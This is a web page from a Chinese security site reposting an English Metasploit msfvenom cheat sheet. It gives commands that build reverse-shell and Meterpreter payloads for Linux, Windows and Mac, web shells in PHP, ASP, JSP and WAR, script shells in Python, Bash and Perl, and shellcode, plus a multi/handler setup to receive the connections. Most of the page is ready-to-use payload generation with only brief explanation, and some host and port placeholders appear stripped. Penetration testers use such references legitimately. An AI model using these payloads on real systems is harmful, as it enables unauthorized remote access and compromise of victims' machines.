标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-78]   作者: jiwozck 发表于: [2017-07-17]  [2017-07-17]被用户:jiwozck 修改过

本文共 [620] 位读者顶过

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.[出自:jiwo.org]

List payloads

msfvenom -l


Binaries:


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=LPORT=-f elf > shell.elf


Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=LPORT=-f exe > shell.exe


Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=LPORT=-f macho > shell.macho



Web Payloads

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=LPORT=-f raw > shell.php

cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php


ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=LPORT=-f asp > shell.asp


JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=LPORT=-f raw > shell.jsp


WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=LPORT=-f war > shell.war
Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=LPORT=-f raw > shell.py


Bash

msfvenom -p cmd/unix/reverse_bash LHOST=LPORT=-f raw > shell.sh


Perl

msfvenom -p cmd/unix/reverse_perl LHOST=LPORT=-f raw > shell.pl


Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=LPORT=-f


Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=LPORT=-f


Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=LPORT=-f



Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘

评论

暂无
发表评论
 返回顶部 
热度(620)
 关注微信